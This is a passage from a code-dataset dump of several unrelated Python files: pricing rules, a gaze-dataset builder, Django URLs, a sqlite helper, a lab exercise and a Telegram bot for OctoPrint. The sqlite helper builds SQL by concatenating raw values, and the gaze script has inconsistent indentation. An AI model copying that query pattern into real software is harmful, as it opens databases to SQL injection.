rule_level_prefix=self.rule_level_prefix,\n rule_name=rule_name,\n if_exists=if_exists,\n desc=desc,\n *args,\n **kwargs\n )\n\n # TODO: DEFINE default rules here\n @staticmethod\n def default_pre_rule(row):\n return True, 'pass'\n\n @staticmethod\n def default_core_rule(row):\n return None, None\n\n @staticmethod\n def default_uplift_rule(row):\n return row['core_rule_value'], 'No Uplift'\n\n @staticmethod\n def default_post_rule(row):\n return round(row['uplift_rule_value'], 2), 'No post_rule'\n\n @staticmethod\n def defalut_deal_flag_rule(row):\n return 'N', 
'Default Deal Flag 1'\n\n @staticmethod\n def default_price_day(row, batch_date_str):\n if row['reg'] - row['post_rule_value'] < 0.01:\n return 0, 'Default 1-day delete_flag'\n else:\n if 0 <= row['run_id'] < 43200: # Morning run, push 1 day:\n day_range = 0, 'Morning run, 1 day'\n else:\n day_range = 1, 'Default 2-day pricing'\n batch_dt = dt.datetime.strptime(batch_date_str, '%Y-%m-%d')\n daydiff = (dt.datetime.strptime(row['rule_end_date'], '%Y-%m-%d') - batch_dt).days\n if daydiff < day_range[0]:\n day_range = daydiff, 'bound by incoming dp rule ending'\n if row['uplift_end_dt'] is not None:\n daydiff = (dt.datetime.strptime(row['uplift_end_dt'], '%Y-%m-%d') - batch_dt).days\n if daydiff < day_range[0]:\n day_range = daydiff, 'bound by incoming uplift ending'\n return day_range\n\n @staticmethod\n def default_priority(row):\n return int(row['run_id'] // 60), 'Default priority'\n\n def get_merge_func(self):\n raise Exception(\"NotImplementedException\")\n\n def get_min_margin_func(self):\n raise Exception(\"NotImplementedException\")\n\n def get_min_comp_func(self):\n raise Exception(\"NotImplementedException\")\n\n def assemble_min_margin_func(self) -> dpr.DP_func:\n min_margin_udf = min_margin_template.get_static_mm_udf(self.get_min_margin_func())\n return dpr.DP_func(\n min_margin_template.apply_rule,\n func_desc='Apply static_table_MM udf function',\n pyudf=min_margin_udf\n )\n\n def assemble_min_comp_func(self) -> dpr.DP_func:\n min_comp_udf = min_comp_template.get_min_comp_udf(self.get_min_comp_func())\n return dpr.DP_func(\n min_comp_template.apply_rule,\n func_desc='Apply comp udf function',\n pyudf=min_comp_udf\n )\n\n def add_rule_end_date(self):\n def add_script_end_date(df: DataFrame, rule_end_date):\n return df.withColumn('rule_end_date', F.lit(rule_end_date).cast(T.StringType()))\n\n return add_script_end_date\n\n # ---------------------------------------- #\n\n def get_pre_rule(self) -> List[dpr.Working_func]:\n raise Exception(\"NotImplementedException\")\n\n def get_core_rule(self) -> List[dpr.Working_func]:\n raise Exception(\"NotImplementedException\")\n\n def get_uplift_rule(self) -> List[dpr.Working_func]:\n raise Exception(\"NotImplementedException\")\n\n def get_post_rule(self) -> List[dpr.Working_func]: # Core rule price filter applied\n raise Exception(\"NotImplementedException\")\n\n def get_deal_flag_rule(self) -> List[dpr.Working_func]:\n raise Exception(\"NotImplementedException\")\n\n def get_day_range_rule(self) -> List[dpr.Working_func]:\n raise Exception(\"NotImplementedException\")\n\n def get_priority_rule(self) -> List[dpr.Working_func]:\n raise Exception(\"NotImplementedException\")\n\n def get_rule_func(self) -> dpr.DP_func:\n total_func = [self.get_pre_rule(), self.get_core_rule(),\n self.get_uplift_rule(), self.get_post_rule(),\n self.get_deal_flag_rule(), self.get_day_range_rule(), self.get_priority_rule()]\n\n total_func[0].append(dpr.Working_func(self.default_pre_rule, 'Pass pre_rule'))\n\n total_func[1].append(dpr.Working_func(self.default_core_rule, 'No core_rule'))\n\n total_func[2].append(dpr.Working_func(self.default_uplift_rule, 'No uplift_rule'))\n\n total_func[3].append(dpr.Working_func(self.default_post_rule, 'No post_rule'))\n\n total_func[4].append(dpr.Working_func(self.defalut_deal_flag_rule, 'Deal_flag N'))\n\n total_func[5].append(dpr.Working_func(partial(self.default_price_day,\n batch_date_str=self.time_now.strftime('%Y-%m-%d')),\n 'Default 2-day pricing, 1-day Delete flag'))\n 
total_func[6].append(dpr.Working_func(self.default_priority, 'Default priority: 0 (minimum)'))\n total_rule_lst = []\n for idx, each_tuple in enumerate(self.sears_online_rule_schema):\n total_rule_lst.append((each_tuple[0], each_tuple[1], total_func[idx]))\n return self.thisrule.rule_wrapper(total_rule_lst)\n\n def construct_rule(self) -> dpr.Harlem_Rule:\n self.thisrule.add_rule_layer(dpr.DP_func(self.get_merge_func(), input_type='Dict'), args=(self.scope,))\n self.thisrule.add_rule_layer(dpr.DP_func(self.add_rule_end_date()),\n args=(self.rule_end_dt.strftime('%Y-%m-%d'),))\n self.thisrule.add_rule_layer(self.assemble_min_margin_func())\n self.thisrule.add_rule_layer(self.assemble_min_comp_func())\n self.thisrule.add_rule_layer(self.get_rule_func())\n return self.thisrule\n","sub_path":"Sears_Online_Rule/harlem125_interface.py","file_name":"harlem125_interface.py","file_ext":"py","file_size_in_byte":16838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"417988913","text":"#create dataset to regression forests\n# coding: utf-8\nimport os\nimport numpy as np\n\nimport torch\nimport torch.utils.data\n\n#groups=[theta,phi]\ndef can_be_center(groups,theta,phi,numGrps,curr_dist):\n\tfor i in range(numGrps):\n\t\tif np.sqrt( (groups[i][0]-theta)**2 + (groups[i][1]- phi)**2 ) < curr_dist:\n\t\t#if np.sqrt( (groups[i][0]-theta)<<1 + (groups[i][1]- phi)<<1 ) < curr_dist:\n\t\t\treturn False\n\t#print(\"new center!!!!!\")\n\treturn True\n\n####\ndef find_nearest_group(theta,phi,groups_centers):\n\tminDst = 100;\n\tmaxDist=0.3\n\tnearestGrp = -1; \n\tfor i in range(len(groups_centers)):\n\t\tif abs(groups_centers[i,0]-theta) < maxDist and abs(groups_centers[i,1]-phi) < maxDist: \n\t\t\tdist= abs(groups_centers[i,0]-theta)+abs(groups_centers[i,1]-phi)\n\t\t\tif dist < minDst:\n\t\t\t\tminDst=dist\n\t\t\t\tnearestGrp=i\n\n\tif nearestGrp==-1:\n\t\tprint(\"probleeeeeeeeeeemmmmmmmmmmmmmmmmmmmmm\")\n\t\tprint(\"len:\",)\n\t\tprint(\"minDst:\",minDst)\n\treturn nearestGrp\n\ndef find_R_nearest_groups(centerTheta, centerPhi, groups_centers, R, first, NUM_OF_GROUPS):\n\tlistOfGroupIds=[-1 for i in range(R+1)]\n\tlistOfGroupIds[0] = first+1\n\tminDist=[]#zeros(R+1)\n\tfor i in range(R+1):\n\t\tminDist.append(7+i)\n\n\tfor i in range(NUM_OF_GROUPS):\n\t\tif i != first:#fi+1 not in listOfGroupIds:\n \t\t\tdist = abs(groups_centers[i][0]-centerTheta) + abs(groups_centers[i][1]-centerPhi)\n \t\t\tif dist < minDist[R]:\n \t\t\t\tfor o in range(1,R+1):\n \t\t\t\t\tif dist < minDist[o]:\n \t\t\t\t\t\tif o == R:\n \t\t\t\t\t\t\tlistOfGroupIds[o]=i+1\n \t\t\t\t\t\t\tminDist[o]=dist\n \t\t\t\t\t\telse:\n \t\t\t\t\t\t\tj=R-1\n \t\t\t\t\t\t\twhile j >= o:\n \t\t\t\t\t\t\t\tlistOfGroupIds[j+1]=listOfGroupIds[j]\n \t\t\t\t\t\t\t\tminDist[j+1]=minDist[j]\n \t\t\t\t\t\t\t\tj=j-1\n \t\t\t\t\t\t\tlistOfGroupIds[o]=i+1\n \t\t\t\t\t\t\tminDist[o]=dist\n \t\t\t\t\t\tbreak\n\t#print(\"final list:\",listOfGroupIds)\n\treturn np.array(listOfGroupIds)\n\nimport h5py\n#initialize data\ngroups_poses={}\ngroups_gazes={}\ngroups_images={}\ngroups_nearests={}\n\nnumGrps=0;groups_centers=[]\nsubject_ids = ['p{:02}'.format(index) for index in range(15)]\ndataset_dir='/home/olympia/MPIIGaze/python/pytorch/data/'\ncurr_dist = 0.05#[0.03 0.04 0.05 0.06 0.07];%evgala to 0.06\n\n\nprint(subject_ids) \nfor subject_id in subject_ids[0:2]:#(0,5,10,15)\n\tpath = os.path.join(dataset_dir, '{}.npz'.format(subject_id ))\n\t#/home/olympia/MPIIGaze/python/pytorch/data/p12.npz\n\t\n\twith 
np.load(path) as fin:\n\t\timages = fin['image']#[0:2400]\n\t\tposes = fin['pose']#[0:2400]\n\t\tgazes = fin['gaze']#[0:2400]\n\t\tlength = len(images)\n\n\tfor i in range(len(poses[:,1])):\n\t\t#can_be_center(groups,theta,phi,numGrps,curr_dist):\n\n\t\tanswer = True\n\n\t\t##### can_be_center_or_not ###\n\t\tfor j in range(numGrps):\n\t\t\tif np.sqrt( (groups_centers[j][0]-poses[i][0])**2 + (groups_centers[j][1]- poses[i][1])**2 ) < curr_dist:\n\t\t\t\t#if np.sqrt( (groups[i][0]-theta)<<1 + (groups[i][1]- phi)<<1 ) < curr_dist:\n\t\t\t\tanswer = False\n\t\tif answer:\n\t\t\tgroups_centers.append(poses[i,:])#([poses[i,0],poses[i,1]])\n\n\n\t\t\t# groups_poses[numGrps] = []#struct(gazes,poses,data)\n\t\t\t# groups_gazes[numGrps] = []\n\t\t\t# groups_images[numGrps] = []\n\t\t\t# groups_nearests[numGrps]=[]\t\n\t\t\t# groups_poses[numGrps].append(poses[i,:])\n\t\t\t# groups_gazes[numGrps].append(gazes[i,:])\n\t\t\t# groups_images[numGrps].append(images[i,0,13:22,22:37])\n\t\t\t# groups_nearests[numGrps]=[numGrps]# this may be a problem here; use \"-1\" if needed\n\t\t\t# groups_poses[nearestGrp].append(poses[i,:])\n\t\t\t# groups_gazes[nearestGrp].append(gazes[i,:])\n\t\t\t# groups_images[nearestGrp].append(images[i,0,13:22,22:37])\n\t\t\tnumGrps=numGrps+1\n\t\t\t#print(\"new center!!!!!\")\n\n#print(\"NumOfCenters:\",numGrps)\nprint(\"numGrps:\",numGrps)\n#for the regression forests we have to reshape the data: instead of the full 60x36 frame,\n#the eye crop used below is 9x15\ngroups_centers=np.array(groups_centers)\nw=0\nfor i in range(numGrps):\n\tgroups_poses[i] = []#struct(gazes,poses,data)\n\tgroups_gazes[i] = []\n\tgroups_images[i] = []\n\tgroups_nearests[i]=[]\t\n\nfor subject_id in subject_ids[0:2]:\n\tpath = os.path.join(dataset_dir, '{}.npz'.format(subject_id ))\n\t#/home/olympia/MPIIGaze/python/pytorch/data/p12.npz\n\twith np.load(path) as fin:\n\t\timages= np.empty((3000, 1, 36, 60))\n\t\timages[:,0,:,:] = fin['image']*255\n\t\t#images[:,0,0:9,0:16]=images[:,0,13:22,22:38]#images[:,22:37,13:22]\n\t\tposes = fin['pose']#[0:2400]\n\t\tgazes = fin['gaze']#[0:2400]\n\t\t#length = len(images)\n\n\t#img = temp.data.left.image(num_i, 14:22, 23:37);\n    #img = reshape(img, HEIGHT ,WIDTH);\n\n\t### for every training sample ###\n\tfor i in range(len(poses[:,1])):\n\t\t### find_nearest_group() ###\n\t\tminDst=1000\n\t\tmaxDist=0.3\n\t\t\n\t\tfor j in range(numGrps):\n\n\t\t\tif abs(groups_centers[j,0]-poses[i,0]) < maxDist and abs(groups_centers[j,1]-poses[i,1]) < maxDist: \n\t\t\t\tdist= abs(groups_centers[j,0]-poses[i,0])+abs(groups_centers[j,1]-poses[i,1])\n\t\t\t\tif dist < minDst:\n\t\t\t\t\tminDst=dist\n\t\t\t\t\tnearestGrp=j\n\t\tif minDst==0:\n\t\t\tw=w+1\n\t\t\t#print(\"grps:\",numGrps,\"popa:\",w)\n\n\t\t\n\t\t#print(\"Added to Group:\",nearestGrp)\n\t\tgroups_poses[nearestGrp].append(poses[i,:])\n\t\tgroups_gazes[nearestGrp].append(gazes[i,:])\n\t\tgroups_images[nearestGrp].append(images[i,0,13:22,22:37])#images[:,0,13:22,22:38]\n\t\t#groups_nearests[i].append(j)\t\t\t\t\t\t\n#from PIL import Image\n#im = Image.fromarray(images[10,0,13:22,22:37])#np.flip(images[10]))\n#im.show()\n\nRADIUS=60\n\nwith h5py.File('small_train_dataset.h5','w') as hdf:\n\tfor i in range(numGrps):\n\t    g=hdf.create_group('g'+str(i+1))\n\t    g.create_dataset('gaze',data=groups_gazes[i],dtype='f8')\n\t    g.create_dataset('headpose',data=groups_poses[i],dtype='f8')\n\t    images_final= np.empty((len(groups_images[i]), 1, 9, 15))\n\t    #(images_final.shape)=(53, 1, 9, 15)\n\t    groups_images[i]=np.array(groups_images[i])\n\t    
#print('i=',i,groups_images[i].shape)#problima an den uparxoun arketa deigmata\t \n\t #print(\"i is:\", i, \"numGrps:\",len(groups_images[i]))\n\t images_final[:,0,:,:]=groups_images[i][:,:,:]\n\n\n\n\t images_final.astype('uint8') \n\t g.create_dataset('data',data=images_final,dtype='uint8')\n\t g.create_dataset('center',data=groups_centers[i].transpose(),dtype='f8')\n\t g.create_dataset('samples',data=len(groups_gazes[i]),dtype='uint32')\n\t listOfGroupIds=find_R_nearest_groups(centerTheta=groups_centers[i][0],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t centerPhi=groups_centers[i][1],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t groups_centers=groups_centers,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t R=RADIUS,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t first=i,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t NUM_OF_GROUPS=len(groups_centers))\n\t g.create_dataset('nearestIDs',data=listOfGroupIds,dtype='uint32')\n\t groups_nearests[i].append(listOfGroupIds)\n\n###### TEST DATA #####\nwith h5py.File('small_test_dataset.h5','w') as hdf:\n\tgaze_dset=hdf.create_dataset('gaze',(0,2),maxshape=(None,2),dtype='f8')\n\tpose_dset=hdf.create_dataset('headpose',(0,2),maxshape=(None,2),dtype='f8')\n\timage_dset=hdf.create_dataset('data',(0,1,9,15),maxshape=(None,1,9,15),dtype='uint8')\n\tnearests_dset = hdf.create_dataset('nearestIDs',(0,RADIUS+1),maxshape=(None,RADIUS+1),dtype='uint32')\n\t\t\t\n\tfor subject_id in subject_ids[3:4]:\n\t\tpath = os.path.join(dataset_dir, '{}.npz'.format(subject_id ))\n\t\t#/home/olympia/MPIIGaze/python/pytorch/data/p12.npz\n\t\twith np.load(path) as fin:#dynamic datasets:https://stackoverflow.com/questions/25655588/incremental-writes-to-hdf5-with-h5py?rq=1\n\t\t\timages= np.empty((len(fin['image']), 1,9,15))\n\t\t\timages[:,0,:,:] = fin['image'][:,13:22,22:37]*255\t\t\t\n\t\t\tposes = fin['pose']\n\t\t\tgazes = fin['gaze']\n\n\n\t\t\t#gaze_dset=hdf.create_dataset('gaze',data=gazes,dtype='f8')\n\t\t\tgaze_dset.resize(gaze_dset.shape[0]+len(gazes), axis=0)\n\t\t\tgaze_dset[-len(gazes):]=gazes \n\n\t\t\t#pose_dset=hdf.create_dataset('headpose',data=poses,dtype='f8')\n\t\t\tpose_dset.resize(pose_dset.shape[0]+len(poses), axis=0)\n\t\t\tpose_dset[-len(poses):]=poses \n\t\t\t\n\t\t\t#image_dset=hdf.create_dataset('data',data=images,dtype='uint8')\n\t\t\timages.astype('uint8')\n\t\t\timage_dset.resize(image_dset.shape[0]+len(images), axis=0)\n\t\t\timage_dset[-len(images):]=images#fin['image'] \n\n\t\t\tnearests=np.zeros((len(poses[:,0]),RADIUS+1))\n\t\t\tfor i in range(len(poses[:,0])):\n\t\t\t\t#print(i)\n\t\t\t\tgrp=find_nearest_group(poses[i,0],poses[i,1],groups_centers)\n\t\t\t\tnearests[i,:]=np.array(groups_nearests[grp])\n\t\t\t#nearests=np.array(nearests)\n\t\t\t#nearests_dset = hdf.create_dataset('nearestIDs',data=nearests,dtype='uint32')\n\t\t\tnearests_dset.resize(nearests_dset.shape[0]+len(images), axis=0)\n\t\t\tnearests_dset[-len(images):]=nearests#fin['image'] \n\t\n\n# with h5py.File('test_dataset.h5','w') as hdf:\n# hdf.create_dataset('gazes',data=test_gaze)\n# hdf.create_dataset('poses',data=test_pose)\n# hdf.create_dataset('label',data=test_img)\n\n\n\t\t#type=tensor\n\t\t#images = torch.unsqueeze(torch.from_numpy(images), 1)\n\t\t#poses = torch.from_numpy(poses)\n\t\t#gazes = torch.from_numpy(gazes)\n\t\t#print(type(gazes))\n\n","sub_path":"python/pytorch/forestDB_3fold.py","file_name":"forestDB_3fold.py","file_ext":"py","file_size_in_byte":8628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"504453516","text":"\"\"\"timepersistant URL 
Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom django.views.generic import RedirectView\n\nfrom main import views\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^favicon\\.ico$', RedirectView.as_view(url='/static/favicon.ico')),\n url(r'^voyage/([0-9]+)', views.voyage_show),\n url(r'^voyage/last', views.voyage_show_last),\n url(r'^api/start_voyage', views.start_voyage, name=\"start_voyage\"),\n url(r'^api/stop_voyage', views.stop_voyage, name=\"stop_voyage\"),\n url(r'^api/voyage/([0-9]+)/add-time', views.modify_voyage('add')),\n url(r'^api/voyage/([0-9]+)/decrease-time', views.modify_voyage('decrease')),\n url(r'^api/voyage/([0-9]+)', views.voyage),\n url(r'^api/voyage', views.voyage),\n url(r'^$', views.main, name=\"main\"),\n]\n","sub_path":"timepersistant/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"507606681","text":"import sqlite3\n\n\ndef insert_img(tableName, fname=None, **kwargs):\n vals = sorted(kwargs.items())\n query = \"INSERT INTO \" + tableName +\"(\"\n for (key, val) in vals:\n query += str(key)+\", \"\n query = query[:-2] + \")\"\n query += \" VALUES (\"\n for (key, val) in vals:\n query += str(val) + \",\"\n query = query[:-1] + \")\"\n print(query)\n return query\n\n\ndef convert_to_binary_data(filename):\n # Convert digital data to binary format\n with open(filename, 'rb') as file:\n blob_data = file.read()\n return blob_data\n","sub_path":"dbUtils/createQuery.py","file_name":"createQuery.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"131336450","text":"import dataProcessing.raw_data_processing as raw\nimport pandas as pd\n\nroot_path = '../data/'\ncount_observatory = 17\n\n\ndef particulate_observatory_data_open(filename):\n pd_file = pd.read_csv(filename)\n pd_file = pd_file.dropna(thresh=2)\n return pd_file\n\n\ndef combine_data_oil_weather_open():\n file_path = root_path + 'combine_data.csv'\n pd_file = pd.read_csv(file_path)\n\n return pd_file\n\n\ndef combine_weather_oil_particulate():\n pd_combine_data = combine_data_oil_weather_open()\n\n file_path_root = root_path + '/raw/'\n file_path_tail = 'particulate_observatory.csv'\n\n pd_combine = []\n\n for i in range(1, count_observatory):\n file_path = file_path_root + str(i) + file_path_tail\n pd_particulate = particulate_observatory_data_open(file_path)\n # pd_particulate.to_csv('./data/asdf'+str(i)+'.csv', index=False)\n\n pd_combine.append(pd.merge(pd_particulate, pd_combine_data))\n\n return pd_combine\n\n\ndef combine_data_all():\n raw.raw_data_init()\n list_combine = combine_weather_oil_particulate()\n data = list_combine[0]\n\n for i in range(1, len(list_combine)):\n data = pd.concat([data, list_combine[i]])\n\n data = 
data.sort_values(['date'], ascending=[True])\n    data.to_csv(root_path + 'data.csv', index=False)\n\n    print(\"All data combined >>>> OK :)\")\n\n\nif __name__ == '__main__':\n    combine_data_all()\n","sub_path":"dataProcessing/combine_all_data.py","file_name":"combine_all_data.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"421353492","text":"# Read the file\n\ntexts = []\n\nfile = open('data.txt', 'r')\n# file = open('data lab10_p4 Feedback.txt', 'r') # Feedback test code\n\nreader = file.readline()\nwhile reader != '':\n    texts.append(int(reader[:-1]))\n    reader = file.readline()\n\nfile.close()\n\n# Make the result\n\n#\n# Feedback : -6.25(25%) list out of range exception when the number of the input is only one\n# # Old code\n#\n# result = [(texts[0]*2 + texts[1])/3]\n#\n# for i in range(0, len(texts)-2):\n#     result.append((texts[i] + texts[i+1] + texts[i+2])/3)\n#\n# result.append((texts[-2] + texts[-1]*2)/3)\n#\nresult = []\n\nx1 = [texts[0]] + texts + [texts[-1]]\n\nfor i in range(0, len(x1)-2):\n    result.append( ( x1[i] + x1[i+1] + x1[i+2] ) / 3)\n#\n# Feedback completed\n#\n\n# Print\n\nprint(result)\n\n# Feedback : -6.25(25%) list out of range exception when the number of the input is only one\n","sub_path":"Lab solutions/Lab10/lab10_p4 Feedback.py","file_name":"lab10_p4 Feedback.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"426582062","text":"from __future__ import absolute_import\nfrom PIL import Image\nimport threading, requests, re, io, time, datetime, StringIO, json, random, logging, traceback\nimport octoprint.plugin, octoprint.util, octoprint.filemanager.util\nfrom flask.ext.babel import gettext\n\nclass TelegramListener(threading.Thread):\n\tdef __init__(self, main):\n\t\tthreading.Thread.__init__(self)\n\t\tself.update_offset = 0\n\t\tself.first_contact = True\n\t\tself.main = main\n\t\tself.do_stop = False\n\t\tself.username = \"UNKNOWN\"\n\t\tself._logger = main._logger.getChild(\"listener\")\n\t\n\tdef run(self):\n\t\tself._logger.debug(\"Listener is running.\")\n\t\ttry:\n\t\t\tself.username = self.main.test_token()\n\t\texcept Exception as ex:\n\t\t\tself.set_status(gettext(\"Got an exception while initially trying to connect to telegram: %(ex)s\", ex=ex))\n\t\t\treturn\n\t\tself.set_status(gettext(\"Connected as %(username)s.\", username=self.username), ok=True)\n\t\t\n\t\twhile not self.do_stop:\n\t\t\tself._logger.debug(\"listener: sending request with offset \" + str(self.update_offset) + \"...\")\n\t\t\treq = None\n\t\t\ttry:\n\t\t\t\ttimeout = '30'\n\t\t\t\tif self.update_offset == 0 and self.first_contact:\n\t\t\t\t\ttimeout = '0'\n\t\t\t\t\tself.update_offset = 1\n\t\t\t\treq = requests.get(self.main.bot_url + \"/getUpdates\", params={'offset':self.update_offset, 'timeout':timeout}, allow_redirects=False)\n\t\t\texcept Exception as ex:\n\t\t\t\tself.set_status(gettext(\"Got an exception while trying to connect to telegram API: %(exception)s. Waiting 2 minutes before trying again.\", exception=ex))\n\t\t\t\ttime.sleep(120)\n\t\t\t\tcontinue\n\t\t\tif req.status_code != 200:\n\t\t\t\tself.set_status(gettext(\"Telegram API responded with code %(status_code)s. Waiting 2 minutes before trying again.\", status_code=req.status_code))\n\t\t\t\ttime.sleep(120)\n\t\t\t\tcontinue\n\t\t\tif req.headers['content-type'] != 'application/json':\n\t\t\t\tself.set_status(gettext(\"Unexpected Content-Type. 
Expected: application/json. Was: %(type)s. Waiting 2 minutes before trying again.\", type=req.headers['content-type']))\n\t\t\t\ttime.sleep(120)\n\t\t\t\tcontinue\n\t\t\tjson = req.json()\n\t\t\tif not json['ok']:\n\t\t\t\tself.set_status(gettext(\"Response didn't include 'ok:true'. Waiting 2 minutes before trying again. Response was: %(response)s\", response=json))\n\t\t\t\ttime.sleep(120)\n\t\t\t\tcontinue\n\t\t\ttry:\n\t\t\t\tfor message in json['result']:\n\t\t\t\t\tself._logger.debug(str(message))\n\t\t\t\t\t# Get the update_id to only request newer Messages the next time\n\t\t\t\t\tif message['update_id'] >= self.update_offset:\n\t\t\t\t\t\tself.update_offset = message['update_id']+1\n\t\t\t\t\t\n\t\t\t\t\tif not message['message'] or not message['message']['chat']:\n\t\t\t\t\t\tself._logger.warn(\"Response is missing .message or .message.chat. Skipping it.\")\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t\n\t\t\t\t\t### Parse new chats\n\t\t\t\t\tchat = message['message']['chat']\n\t\t\t\t\tchat_id = str(chat['id'])\n\t\t\t\t\tdata = {'accept_commands' : False, 'send_notifications' : False}\n\t\t\t\t\tif chat_id in self.main.chats:\n\t\t\t\t\t\tdata = self.main.chats[chat_id]\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.main.chats[chat_id] = data\n\t\t\t\t\t\n\t\t\t\t\tif chat['type']=='group':\n\t\t\t\t\t\tdata['private'] = False\n\t\t\t\t\t\tdata['title'] = chat['title']\n\t\t\t\t\telif chat['type']=='private':\n\t\t\t\t\t\tdata['private'] = True\n\t\t\t\t\t\tdata['title'] = \"\"\n\t\t\t\t\t\tif \"first_name\" in chat:\n\t\t\t\t\t\t\tdata['title'] += chat['first_name'] + \" - \"\n\t\t\t\t\t\tif \"last_name\" in chat:\n\t\t\t\t\t\t\tdata['title'] += chat['last_name'] + \" - \"\n\t\t\t\t\t\tif \"username\" in chat:\n\t\t\t\t\t\t\tdata['title'] += \"@\" + chat['username']\n\t\t\t\t\tself._logger.debug(\"Chats: \" + repr(self.main.chats))\n\n\t\t\t\t\t#if message from group, user allowed?\n\t\t\t\t\tfrom_id = chat_id\n\t\t\t\t\tif not data['private'] and data['accept_commands']:\n\t\t\t\t\t\tfrom_id = str(message['message']['from']['id'])\n\t\t\t\t\t\t\n\t\t\t\t\tif self.first_contact:\n\t\t\t\t\t\tself._logger.debug(\"Ignoring message because first_contact is True.\")\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t\n\t\t\t\t\tif \"text\" in message['message']:\n\t\t\t\t\t\t# We got a chat message.\n\t\t\t\t\t\tmsg_list = message['message']['text'].split('@')\n\t\t\t\t\t\tcommand = message['message']['text'].split('@')[0]\n\t\t\t\t\t\tparameter = None\n\t\t\t\t\t\tif \"reply_to_message\" in message['message'] and \"text\" in message['message']['reply_to_message']:\n\t\t\t\t\t\t\tcommand = message['message']['reply_to_message']['text']\n\t\t\t\t\t\t\tparameter = message['message']['text']\n\t\t\t\t\t\t\n\t\t\t\t\t\tself._logger.info(\"Got a command: '\" + command + \"' in chat \" + str(message['message']['chat']['id']))\n\t\t\t\t\t\tif from_id in self.main.chats and self.main.chats[from_id]['accept_commands'] and self.main.chats[from_id]['private']:\n\t\t\t\t\t\t\tif command==\"/abort\":\n\t\t\t\t\t\t\t\tself.main.track_action(\"command/abort\")\n\t\t\t\t\t\t\t\tif self.main._printer.is_printing():\n\t\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Really abort the currently running print?\"), responses=[gettext(\"Yes, abort the print!\"), gettext(\"No, don't abort the print.\")],chatID=chat_id)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Currently I'm not printing, so there is nothing to stop.\"),chatID=chat_id)\n\t\t\t\t\t\t\telif command==gettext(\"Yes, abort the 
print!\"):\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Aborting the print.\"),chatID=chat_id)\n\t\t\t\t\t\t\t\tself.main._printer.cancel_print()\n\t\t\t\t\t\t\telif command==gettext(\"No, don't abort the print.\"):\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Okay, nevermind.\"),chatID=chat_id)\n\t\t\t\t\t\t\telif command==\"/shutup\":\n\t\t\t\t\t\t\t\tself.main.track_action(\"command/shutup\")\n\t\t\t\t\t\t\t\tself.main.shut_up = True\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Okay, shutting up until the next print is finished. Use /imsorrydontshutup to let me talk again before that.\"),chatID=chat_id)\n\t\t\t\t\t\t\telif command==\"/imsorrydontshutup\":\n\t\t\t\t\t\t\t\tself.main.track_action(\"command/imsorrydontshutup\")\n\t\t\t\t\t\t\t\tself.main.shut_up = False\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Yay, I can talk again.\"),chatID=chat_id)\n\t\t\t\t\t\t\telif command==\"/test\":\n\t\t\t\t\t\t\t\tself.main.track_action(\"command/test\")\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Is this a test?\"), responses=[gettext(\"Yes, this is a test!\"), gettext(\"A test? Why would there be a test?\")],chatID=chat_id)\n\t\t\t\t\t\t\telif command==gettext(\"Yes, this is a test!\"):\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"I'm behaving, then.\"),chatID=chat_id)\n\t\t\t\t\t\t\telif command==gettext(\"A test? Why would there be a test?\"):\n\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Phew.\"),chatID=chat_id)\n\t\t\t\t\t\t\telif command==\"/status\":\n\t\t\t\t\t\t\t\tself.main.track_action(\"command/status\")\n\t\t\t\t\t\t\t\tif not self.main._printer.is_operational():\n\t\t\t\t\t\t\t\t\tself.main.send_msg(gettext(\"Not connected to a printer.\"),chatID=chat_id)\n\t\t\t\t\t\t\t\telif self.main._printer.is_printing():\n\t\t\t\t\t\t\t\t\tstatus = self.main._printer.get_current_data()\n\t\t\t\t\t\t\t\t\tself.main.on_event(\"TelegramSendPrintingStatus\", {'z': (status['currentZ'] or 0.0)},chatID=chat_id)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tself.main.on_event(\"TelegramSendNotPrintingStatus\", {},chatID=chat_id)\n\t\t\t\t\t\t\telif command==\"/settings\":\n\t\t\t\t\t\t\t\tself.main.track_action(\"command/settings\")\n\t\t\t\t\t\t\t\tmsg = gettext(\"Current settings are:\\n\\nNotification height: %(height)fmm\\nNotification time: %(time)dmin\\n\\nWhich value do you want to 